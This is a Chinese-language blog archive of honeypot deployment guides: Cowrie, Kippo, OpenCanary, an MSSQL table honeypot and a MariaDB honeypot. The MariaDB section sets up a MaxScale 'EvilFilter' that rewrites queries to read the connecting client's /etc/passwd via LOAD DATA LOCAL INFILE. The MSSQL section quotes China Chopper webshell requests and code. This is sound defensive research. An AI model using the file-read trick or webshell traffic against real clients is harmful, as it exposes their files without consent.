标签归档:蜜罐

【蜜罐】Cowrie:一款SSH / Telnet蜜罐

0x01 简介

cowrie是一款基于kippo更改的中交互ssh蜜罐,部署在公网可以用于收集恶意IP,丰富密码字典和攻击样本,部署在内网可以用于入侵感知和拖延攻击时间。

 

0x02 安装部署

修改/etc/ssh/sshd_config

将Port 22修改为Port 222

然后重启服务systemctl restart sshd

Cowrie与Kippo一样不支持Root启动,默认的启动端口是2222,所以需要通过iptables将22端口转发到2222端口

[root@localhost yum.repos.d]# systemctl start firewalld

[root@localhost yum.repos.d]# firewall-cmd --permanent --add-port=222/tcp

success

[root@localhost yum.repos.d]# firewall-cmd --zone=public --add-masquerade --permanent

success

[root@localhost yum.repos.d]# firewall-cmd --zone=public --add-forward-port=port=22:proto=tcp:toport=2222 --permanent

success

[root@localhost yum.repos.d]# firewall-cmd --permanent --list-all

public (default)

  interfaces:

  sources:

  services: dhcpv6-client ssh

  ports: 222/tcp

  masquerade: yes

  forward-ports: port=22:proto=tcp:toport=2222:toaddr=

  icmp-blocks:

  rich rules:

      

[root@localhost yum.repos.d]# firewall-cmd --reload

success

安装Cowrie

yum install -y epel-release

yum install -y gcc libffi-devel python-devel openssl-devel git python-pip pycrypto

adduser cowrie -p hehe123

git clone https://github.com/micheloosterhof/cowrie.git

chown -R cowrie:cowrie cowrie/

cd cowrie

mv cowrie.cfg.dist cowrie.cfg

编辑cowrie.cfg

去掉listen_port = 2222的注释

pip install -r requirements.txt

 

0x03 数据库安装

[root@localhost data]# pip install mysql-python

[root@localhost data]# yum install mariadb-server mariadb-devel mariadb

[root@localhost data]# systemctl start mariadb

[root@localhost data]# mysqladmin -u root password hehe123

 

MariaDB [(none)]> CREATE DATABASE cowrie;

Query OK, 1 row affected (0.00 sec)

MariaDB [cowrie]> source /home/cowrie/cowrie/doc/sql/mysql.sql;

MariaDB [cowrie]> show tables;

+------------------+

| Tables_in_cowrie |

+------------------+

| auth             |

| clients          |

| downloads        |

| input            |

| keyfingerprints  |

| sensors          |

| sessions         |

| ttylog           |

+------------------+

8 rows in set (0.00 sec)

然后修改cowrie.cfg中关于mysql的配置,启动Cowrie

[root@localhost cowrie]# su cowrie

[cowrie@localhost cowrie]$ ./bin/cowrie start

Not using Python virtual environment

Starting cowrie: [twistd   --umask 0022 --pidfile var/run/cowrie.pid -l log/cowrie.log cowrie ]...

登录密码记录

MariaDB [cowrie]> select * from auth;

+----+--------------+---------+----------+----------+---------------------+

| id | session      | success | username | password | timestamp           |

+----+--------------+---------+----------+----------+---------------------+

|  1 | c66e2505a393 |       1 | root     | hehe123  | 2017-09-13 23:58:48 |

+----+--------------+---------+----------+----------+---------------------+

1 row in set (0.01 sec)

执行命令记录

MariaDB [cowrie]> select * from input;

+----+--------------+---------------------+-------+---------+---------+

| id | session      | timestamp           | realm | success | input   |

+----+--------------+---------------------+-------+---------+---------+

|  1 | c66e2505a393 | 2017-09-13 23:58:51 | NULL  |       1 | whoami  |

+----+--------------+---------------------+-------+---------+---------+

1 row in set (0.01 sec)

下载文件记录

MariaDB [cowrie]> select * from downloads\G

*************************** 1. row ***************************

       id: 1

  session: c66e2505a393

timestamp: 2017-09-14 00:01:23

      url: https://www.baidu.com/img/bd_logo1.png

  outfile: dl/264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a302602500c589847f5

   shasum: 264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a302602500c589847f5

1 row in set (0.00 sec)

 

0x04 目录结构

data/userdb.txt:设置SSH密码文件

[root@localhost cowrie]# cat data/userdb.txt

root:x:!root

root:x:!123456

root:x:*

txtcmds/*:命令执行返回结果文件

[root@localhost bin]# file df

df: ASCII text

[root@localhost bin]# cat df

Filesystem                                              Size  Used Avail Use% Mounted on

rootfs                                                  4.7G  731M  3.8G  17% /

udev                                                     10M     0   10M   0% /dev

tmpfs                                                    25M  192K   25M   1% /run

/dev/disk/by-uuid/65626fdc-e4c5-4539-8745-edc212b9b0af  4.7G  731M  3.8G  17% /

tmpfs                                                   5.0M     0  5.0M   0% /run/lock

tmpfs                                                   101M     0  101M   0% /run/shm

dl/*:攻击者通过curl/wget下载的文件。

[root@localhost dl]# ls

264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a302602500c589847f5

/bin/playlog:用于重演会话日志,日志存在于log/tty/目录下,可以查看攻击者执行命令过程。

[root@localhost cowrie]# ./bin/playlog  log/tty/20170913-233922-21cf6e129ef5-0i.log

data/fs.pickle:伪装的文件系统

honeyfs/:伪装文件系统的文件内容

[root@localhost cowrie]# cat honeyfs/etc/issue 

Debian GNU/Linux 7 \n \l

log/cowrie.json:JSON格式的处理输出

log/cowrie.log:log/debug输出

 

 

MSSQL数据库蜜罐测试

简介


MSSQL 2008 R2可以使用MSSQL的审计功能,在每个线上数据库中创建一张蜜罐表,使用审计功能对该表的增删改查操作做监控,MSSQL会将操作日志记录到文件中。

测试


测试使用菜刀马连接数据库,获取数据库的请求如下:

tom=N&z0=GB2312&z1=com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://192.168.***.***:1433;databaseName=***;user=sa;password=***&z2=

程序如下:

else if(Z.equals("N")){NN(z1,sb);}

可以看到调用了NN函数

void NN(String s,StringBuffer sb)throws Exception{
Connection c=GC(s);
ResultSet r=c.getMetaData().getCatalogs();
while(r.next()){
sb.append(r.getString(1)+"\t");
}
r.close();
c.close();
}

getMetaData().getCatalogs()表示返回所有的数据库

双击数据库获取表的时候菜刀发送的请求包如下:

tom=O&z0=GB2312&z1=com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://192.168.***.***:1433;databaseName=***;user=sa;password=***
kefu&z2=

调用OO(z1,sb);

void OO(String s,StringBuffer sb)throws Exception{
Connection c=GC(s);
String[] t={"TABLE"};
ResultSet r=c.getMetaData().getTables (null,null,"%",t);
while(r.next()){
sb.append(r.getString("TABLE_NAME")+"\t");
}r.close();c.close();}

会调用getTables函数,所执行的sql语句如下:

select
            TABLE_QUALIFIER = convert(sysname,db_name()),
            TABLE_OWNER     = convert(sysname,schema_name(o.schema_id)),
            TABLE_NAME      = convert(sysname,o.name),
            TABLE_TYPE      = convert(varchar(32),
                                        rtrim(substring('SYSTEM TABLE            TABLE       VIEW       ',
                                              (ascii(o.type)-83)*12+1,
                                              12))  -- 'S'=0,'U'=2,'V'=3
                                     ),
            REMARKS = convert(varchar(254),null)    -- Remarks are NULL.

        from
            sys.all_objects o

        where
            o.type in ('S','U','V') and
            has_perms_by_name(quotename(schema_name(o.schema_id)) + '.' + quotename(o.name),
                              'object',
                              'select') = 1 and
            charindex(substring(o.type,1,1),@type1) <> 0 and -- Only desired types.
            (@table_name  is NULL or o.name like @table_name) and
            (@table_owner is NULL or schema_name(o.schema_id) like @table_owner)
        order by 4, 1, 2, 3

has_perms_by_name(quotename(schema_name(o.schema_id)) + ‘.’ + quotename(o.name),’object’,’select’) = 1

会判断数据库是否有select权限,导致触发数据库蜜罐。

PS:
公司DBA使用一款从MSSQL导出数据到MYSQL的工具,点击浏览后同样有可能触发到该告警,产生误报。

MariaDB蜜罐测试

环境搭建:

首先安装MariaDB,安装步骤见之前文章。然后安装maxscale,maxscale是mariadb公司开发的一套数据库中间件。
maxscale rpm包下载地址:
https://downloads.mariadb.com/MaxScale/2.1.0/centos/6Server/x86_64/maxscale-2.1.0-1.centos.6.x86_64.rpm
10.200.1.112为Mariadb所在服务器

[root@kafka112 tmp]# yum install maxscale-2.1.0-1.centos.6.x86_64.rpm

maxscale.conf的配置文件如下:

------------------------------------------------
[maxscale]
threads=1

[server1]
type=server
address=127.0.0.1
port=3306
protocol=MySQLBackend

[EvilFilter]
type=filter
module=regexfilter
options=ignorecase
match=.*server_id.*
replace=LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test.loot

[Read-Connection-Router]
type=service
router=readconnroute
servers=server1
user=root
passwd=Hehe123456
filters=EvilFilter

[Read-Connection-Listener]
type=listener
service=Read-Connection-Router
protocol=MySQLClient
port=4008

[MySQL-Monitor]
type=monitor
module=mysqlmon
servers=server1
user=root
passwd=Hehe123456
monitor_interval=1000
------------------------------------------------

在10.200.1.111上创建账户mariadb

[root@kafka111 ~]# useradd mariadb
[root@kafka111 ~]# cat /etc/passwd |grep mariadb
mariadb:x:667:667::/home/mariadb:/bin/bash

在10.200.1.111上连接10.200.1.112的4008端口

mysql -h 10.200.1.112 -u root -P 4008 -p
mysql> use test;
Database changed
mysql> create table loot (name varchar(5000));
Query OK, 0 rows affected (0.04 sec)

配置文件中的正则:.*server_id.* 匹配上后会执行LOAD DATA LOCAL INFILE ‘/etc/passwd’ INTO TABLE test.loot

mysql> select @@server_id;
Query OK, 31 rows affected (0.01 sec)
Records: 31 Deleted: 0 Skipped: 0 Warnings: 0
mysql> select * from loot where name like "%mariadb%";
+--------------------------------------------+
| name |
+--------------------------------------------+
| mariadb:x:667:667::/home/mariadb:/bin/bash |
+--------------------------------------------+
1 row in set (0.00 sec)

可以看到客户端的/etc/passwd内容写入到表loot中。


参考文章:

http://www.freebuf.com/sectool/128947.html

【蜜罐】低交互式蜜罐opencanary安装部署

源码:
https://github.com/thinkst/opencanary
https://github.com/thinkst/opencanary-correlator

文档:
https://opencanary.readthedocs.io/en/latest/

1)安装部署

首先需要更换SSH端口为222,需要注意一定要关闭Selinux,不然222端口无法监听成功。
项目要求为Python2.7的环境
而CentOs6.5自带的是2.6.6,可以创建python虚拟沙盒。

pip install virtualenv
wget https://www.python.org/ftp/python/2.7.8/Python-2.7.8.tgz
tar zxvf Python-2.7.8.tgz
cd Python-2.7.8
./configure --prefix=/usr/local/python/
make && make install
virtualenv venv --python=/usr/local/python/bin/python2.7
. venv/bin/activate
(venv) [root@vincent ~]# python -V
Python 2.7.8
pip install opencanary

opebcanary附带一个默认配置,我们可以复制和编辑,这是一个json文件
opencanaryd –copyconfig
##############################
报错:
cp: 无法获取”/root/venv/bin/../lib/python2.7/site-packages/opencanary/data/settings.json” 的文件状态(stat): 没有那个文件或目录
然后按照这个帖子
https://github.com/thinkst/opencanary/commit/809b1836dee2d6d066ecf66d39f98e2ca3a14eea
去掉这行:

cp "${DIR}/../lib/python2.7/site-packages/opencanary/data/settings.json" ~/.opencanary.conf

添加两行:

defaultconf=$(python -c "from pkg_resources import resource_filename; print resource_filename('opencanary', 'data/settings.json')")
cp "${defaultconf}" ~/.opencanary.conf
##############################

然后:

(venv) [root@vincent ~]# venv/bin/opencanaryd --copyconfig
[*] A sample config file is ready (/root/.opencanary.conf)

[*] Edit your configuration, then launch with "opencanaryd --start"

通过查看配置文件可以模拟ftp、http、httpproxy、smb、mysql、mssql、ssh、rdp、telnet等服务
日志文件为/var/tmp/opencanary.log。我们先将SSH端口修改为222.
修改配置文件如下:

{
"device.node_id": "opencanary-1",
"ftp.banner": "FTP server ready",
"ftp.enabled": true,
"ftp.port":21,
"http.banner": "Apache/2.2.22 (Ubuntu)",
"http.enabled": true,
"http.port": 80,
"http.skin": "nasLogin",
"http.skin.list": [
{
"desc": "Plain HTML Login",
"name": "basicLogin"
},
{
"desc": "Synology NAS Login",
"name": "nasLogin"
}
],
"logger": {
"class" : "PyLogger",
"kwargs" : {
"formatters": {
"plain": {
"format": "%(message)s"
}
},
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": "/var/tmp/opencanary.log"
}
}
}
},
"mysql.banner": "5.5.43-0ubuntu0.14.04.1",
"mysql.port": 3306,
"mysql.enabled": true,
"ssh.enabled": true,
"ssh.port": 22,
"ssh.version": "SSH-2.0-OpenSSH_5.1p1 Debian-4",
"portscan.synrate": "5"
}

(venv) [root@vincent ~]# venv/bin/opencanaryd --start
[-] Failed to open opencanary.conf for reading ([Errno 2] No such file or directory: 'opencanary.conf')
[-] Using config file: /root/.opencanary.conf

然后看看监听端口

tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN off (0.00/0/0)

2)测试
测试访问22端口

{"dst_host": "172.16.100.167", "dst_port": 22, "local_time": "2016-06-30 10:35:24.064880", "logdata": {"SESSION": "0"}, "logtype": 4000, "node_id": "opencanary-1", "src_host": "172.16.100.128", "src_port": 56893}

访问21端口:

{"dst_host": "172.16.100.167", "dst_port": 21, "local_time": "2016-06-30 10:38:58.554103", "logdata": {"PASSWORD": "123456", "USERNAME": "root"}, "logtype": 2000, "node_id": "opencanary-1", "src_host": "172.16.100.128", "src_port": 35910}

访问3306端口:

{"dst_host": "172.16.100.167", "dst_port": 3306, "local_time": "2016-06-30 10:39:35.553673", "logdata": {"PASSWORD": "5cc73e54153a4a0322f75d5d2ad4322ab464c1b5", "USERNAME": "root"}, "logtype": 8001, "node_id": "opencanary-1", "src_host": "172.16.100.128", "src_port": 35935}

访问80端口:

123

{"dst_host": "172.16.100.167", "dst_port": 80, "local_time": "2016-06-30 10:40:30.727750", "logdata": {"HOSTNAME": "172.16.100.167", "PASSWORD": "123456", "PATH": "/index.html", "SKIN": "nasLogin", "USERAGENT": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36", "USERNAME": "admin"}, "logtype": 3001, "node_id": "opencanary-1", "src_host": "172.16.100.1", "src_port": 51582}

【蜜罐】Kippo蜜罐部署使用

1)环境搭建:

cd /root/
wget https://codeload.github.com/desaster/kippo/zip/master
unzip master
yum install twisted python-zope-interface python-pyasn1
mv kippo-master kippo
useradd kippo
chown -R kippo:kippo kippo/
cd kippo
cp kippo.cfg.dist kippo.cfg

因为kippo需要用普通账户启动,如果用root账户启动
ERROR: You must not run kippo as root!
因为普通账户无法启动1024以下的端口。首先修改一下本机SSH的端口为222。监听本地的2222端口,加一条防火墙规则,把22端口转到2222。

iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

启动kippo

[kippo@vincent tmp]$ ./kippo/start.sh
twistd (the Twisted daemon) 8.2.0
Copyright (c) 2001-2008 Twisted Matrix Laboratories.
See LICENSE for details.
Starting kippo in the background...
/usr/lib64/python2.6/site-packages/twisted/conch/ssh/keys.py:13: DeprecationWarning: the sha module is deprecated; use the hashlib module instead
import sha, md5
/usr/lib64/python2.6/site-packages/twisted/conch/ssh/keys.py:13: DeprecationWarning: the md5 module is deprecated; use hashlib instead
import sha, md5
Generating new RSA keypair...
Done.
Generating new DSA keypair...
Done.

使用其他机器扫描一下22端口。

root@kali-vincent:/tmp# nmap -p 22 172.16.100.167

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-29 14:58 CST
Nmap scan report for 172.16.100.167
Host is up (0.00036s latency).
PORT STATE SERVICE
22/tcp open ssh

可以看到22打开
使用默认账户密码root/123456登陆。

root@svr03:~# whoami
root
root@svr03:~# pwd
/root

PS:测试发现可以模拟的命令太少了,很容易就能看出来是蜜罐。

2)日志存在到数据库

yum install mysql mysql-server
/etc/init.d/mysqld start
mysql -uroot password hehe123
CREATE USER 'kippo'@'localhost' IDENTIFIED BY 'kippo';
create database kippo;
GRANT ALL ON kippo.* to 'kippo'@'localhost' identified by 'kippo';
flush privileges;

修改配置文件kippo.cfg

[database_mysql]
host = localhost
database = kippo
username = kippo
password = kippo
port = 3306

然后导入表结构

mysql -ukippo -p -Dkippo < /tmp/kippo/doc/sql/mysql.sql

安装python-mysql

yum -y install python-devel mysql-devel
wget http://pypi.python.org/packages/source/s/setuptools/setuptools-0.6c11.tar.gz --no-check-certificate
tar -zxvf setuptools-0.6c11.tar.gz
cd setuptools-0.6c11
python setup.py install
wget https://pypi.python.org/packages/source/M/MySQL-python/MySQL-python-1.2.5.zip --no-check-certificate
Unzip MySQL-python-1.2.5.zip
Cd MySQL-python

修改site.cfg的mysql_config一行取消注释

mysql_config = /usr/lib64/mysql/mysql_config
python setup.py install

来看一下表结构:

mysql> show tables;
+-----------------+
| Tables_in_kippo |
+-----------------+
| auth |
| clients |
| downloads |
| input |
| sensors |
| sessions |
| ttylog |
+-----------------+
7 rows in set (0.01 sec)

执行过的命令:

mysql> select * from input;
+----+----------------------------------+---------------------+-------+---------+----------+
| id | session | timestamp | realm | success | input |
+----+----------------------------------+---------------------+-------+---------+----------+
| 1 | 529661ac3e1511e6b417000c292b5908 | 2016-06-29 16:20:15 | NULL | 1 | whoami |
| 2 | 529661ac3e1511e6b417000c292b5908 | 2016-06-29 16:31:10 | NULL | 1 | ifconfig |
+----+----------------------------------+---------------------+-------+---------+----------+
2 rows in set (0.01 sec)

连接过的IP:

mysql> select * from sessions;
+----------------------------------+---------------------+---------+--------+----------------+----------+--------+
| id | starttime | endtime | sensor | ip | termsize | client |
+----------------------------------+---------------------+---------+--------+----------------+----------+--------+
| 529661ac3e1511e6b417000c292b5908 | 2016-06-29 16:19:58 | NULL | 1 | 172.16.100.128 | 131x25 | 1 |
+----------------------------------+---------------------+---------+--------+----------------+----------+--------+
1 row in set (0.00 sec)

3)图形化

yum install httpd php php-mysql php-gd php-curl

1.3的php版本要求高,要自己编译,还是用yum的,装个低版本的

wget http://bruteforce.gr/wp-content/uploads/kippo-graph-1.2.tar.gz
tar -zxf kippo-graph-1.2.tar.gz
mv kippo-graph-1.2 /var/www/html/kippo
cd /var/www/html/kippo
cp config.php.dist config.php

vim config.php
修改一下内容

define('DIR_ROOT', '/var/www/html/kippo');
define('DB_HOST', 'localhost');
define('DB_USER', 'kippo');
define('DB_PASS', 'kippo');
define('DB_NAME', 'kippo');
define('DB_PORT', '3306');
运行命令
chmod 777 /var/www/html/kippo/generated-graphs/
/etc/init.d/http start
su - kippo
./start.sh

来看下图表展示:

123

4)目录结构
data: 存放ssh key,lastlog.txt和userdb.txt lastlog.txt:last命令的输出,即存储了登陆蜜罐的信息,也可以伪造 userdb.txt:可以登陆的用户,可以给一个用户设置多个密码,一个用户一行 格式为username:uid:password

honeyfs: etc目录中存在group hostname hosts issue passwd resolv.conf shadow这些 文件,cat /etc/filename目录中对应的文件时会显示这些文本文件中的内容. proc目录中存在cpuinfo meminfo version这些文件,cat /proc/filename目录中对应的文件时会显示这些文本文件中的内容.

log: 存放日志文件的地方,该目录包含一个kippo.log文件和tty目录 kippo.log:是存放启动记录,那些IP连接等信息 tty目录是每一个ssh过来后操作的记录,可以使用strings filename直接看到里面的内容
查看kippo.log,例如执行ifconfig
2016-06-30 00:31:10+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,172.16.100.128] CMD: ifconfig
2016-06-30 00:31:10+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,172.16.100.128] Command found: ifconfig
2016-06-30 00:31:10+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,172.16.100.128] Reading txtcmd from “/tmp/kippo/txtcmds/sbin/ifconfig”

txtcmds: 存放命令的地方,这些命令都是文本文件,执行相关命令的时候直接显示文件内容
kippo: 核心文件,模拟一些交互式的命令等等
dl: wget等等下载的文件存放的地方